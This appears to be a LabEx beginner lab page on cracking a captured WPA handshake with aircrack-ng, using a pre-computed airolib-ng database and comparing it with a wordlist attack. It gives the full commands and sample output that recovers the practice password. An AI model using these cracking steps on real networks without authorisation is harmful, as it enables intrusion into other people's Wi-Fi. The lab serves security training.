LabEx
Log InJoin Free

Crack a WPA Handshake using an airolib-ng Database

Beginner
Practice Now

Introduction

When cracking WPA/WPA2 handshakes with aircrack-ng, the standard method involves testing each password from a wordlist. For each password, aircrack-ng must compute a Pairwise Master Key (PMK) and check it against the captured handshake. This on-the-fly computation can be time-consuming, especially with large wordlists.

The airolib-ng tool offers a powerful optimization. It allows you to pre-compute all the PMKs for a specific network (ESSID) and a given wordlist, storing them in a database. When you run the attack, aircrack-ng can use this database to simply look up PMKs instead of computing them, resulting in a dramatic increase in cracking speed.

In this lab, you will learn how to use a pre-built airolib-ng database to crack a WPA handshake and compare its performance to a standard wordlist-based attack.

Capture a WPA Handshake for an ESSID in your Database

In this step, we will inspect the provided capture file to confirm it contains a valid WPA handshake. For this lab, a capture file named wpa.cap has been placed in your ~/project directory. This file contains a captured four-way handshake for the network we will be targeting.

Let's use aircrack-ng to view the contents of this file. This command doesn't start an attack; it simply parses the file and shows a summary of the networks it contains.

Run the following command in your terminal:

aircrack-ng wpa.cap

You should see output that lists the wireless networks found in the capture file. Note the ESSID (the network name) and the confirmation that a handshake was captured.

Opening wpa.cap
Read 1 packets.

   ##  BSSID              ESSID                     Encryption

   1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)

Choosing first network as target.
(press CTRL+C to abort)

You can press CTRL+C to exit the aircrack-ng prompt. The important information is that we have a handshake for the ESSID teddy. This is the network we will target.

Construct the aircrack-ng Command for the Attack

In this step, we will begin constructing the aircrack-ng command for our attack. The basic syntax for a WPA attack is aircrack-ng [options] <capture file>.

To make the attack more efficient, especially when a capture file contains multiple networks, we can specify our target using the -e parameter followed by the ESSID. Based on the previous step, our target ESSID is teddy.

Let's add this to our command:

aircrack-ng -e teddy

This command is not yet complete. aircrack-ng still needs to know where to get the passwords or PMKs to test. In a standard attack, we would use the -w flag to provide a wordlist. However, for this lab, we will be using our pre-computed airolib-ng database. We will add the parameter for the database in the next step.

Specify the Database using the -r Parameter

In this step, we will complete our command by telling aircrack-ng to use the airolib-ng database. The parameter for this is -r (which stands for "read database").

During the setup process for this lab, a database named mydb was created in your ~/project directory. This database contains the pre-computed PMKs for the ESSID teddy and the passwords from wordlist.txt.

Now, let's combine all the pieces: the aircrack-ng command, the target ESSID (-e teddy), the database (-r mydb), and the capture file (wpa.cap).

The final command is:

aircrack-ng -e teddy -r mydb wpa.cap

This command instructs aircrack-ng to:

  1. Target the network with ESSID teddy.
  2. Use the pre-computed PMKs from the database mydb.
  3. Test these PMKs against the handshake found in wpa.cap.

In the next step, we will execute this command and observe the results.

Run the Attack and Observe the Cracking Speed

In this step, it's time to run the attack using our fully constructed command. By using the pre-computed database, we expect the cracking process to be extremely fast.

Execute the following command in your terminal:

aircrack-ng -e teddy -r mydb wpa.cap

The program will start, open the database and the capture file, and almost instantly find the correct key.

Your output should look similar to this:

Opening mydb
Opening wpa.cap
Read 1 packets.

   ##  BSSID              ESSID                     Encryption

   1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)

Choosing first network as target.

Opening mydb
Attack will be restarted every 5000 PMKs.
Starting attack on ESSID teddy...

                                KEY FOUND! [ biscotte ]


Master Key     : 45 45 79 A2 25 5D F9 5A 47 2B 1E 15 7E 22 38 84
                 ...

Transient Key  : 82 2A 8F 85 42 29 A2 1A 29 69 F1 25 2B 23 4C 78
                 ...

EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Notice how quickly the KEY FOUND! message appeared. The password is biscotte. Because the PMKs were already computed and stored in the mydb database, aircrack-ng only had to perform a quick lookup and comparison, not the intensive cryptographic calculations.

Compare Performance to a Standard Wordlist Attack

In this step, to fully appreciate the speed of the airolib-ng database method, we will perform the same attack using the traditional wordlist method. This will allow us to see the performance difference firsthand.

In a standard attack, we use the -w parameter to specify a wordlist file. aircrack-ng will then read each password from the file, compute its PMK, and test it.

The setup process created a file named wordlist.txt for this purpose. Let's run the attack using this file.

Execute the following command:

aircrack-ng -e teddy -w wordlist.txt wpa.cap

You will see aircrack-ng start up and begin testing keys. Pay attention to the status display, which shows the number of keys tested and the current speed in keys per second (k/s).

Opening wpa.cap
Read 1 packets.

   ##  BSSID              ESSID                     Encryption

   1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)

Choosing first network as target.

Opening wpa.cap
Opening wordlist.txt
Reading passwords from wordlist.txt

                                     [0:00:00] 2 keys tested (XXXX.XX k/s)

                                KEY FOUND! [ biscotte ]


Master Key     : 45 45 79 A2 25 5D F9 5A 47 2B 1E 15 7E 22 38 84
                 ...

Transient Key  : 82 2A 8F 85 42 29 A2 1A 29 69 F1 25 2B 23 4C 78
                 ...

EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

While the key is still found quickly because our wordlist is very small, notice that there was a measurable process of testing keys. With a large wordlist containing millions of passwords, this process would take a significant amount of time. The database attack, in contrast, was nearly instantaneous because the computationally expensive part was already done.

Summary

In this lab, you successfully cracked a WPA handshake using a pre-computed airolib-ng database. You learned how to construct the aircrack-ng command using the -r parameter to specify the database and observed its near-instantaneous performance.

By comparing this to a standard wordlist attack using the -w parameter, you witnessed the significant speed advantage of pre-computing PMKs. This technique is invaluable for security professionals when targeting a specific network with a large dictionary of potential passwords, as it separates the time-consuming computation phase from the final cracking phase.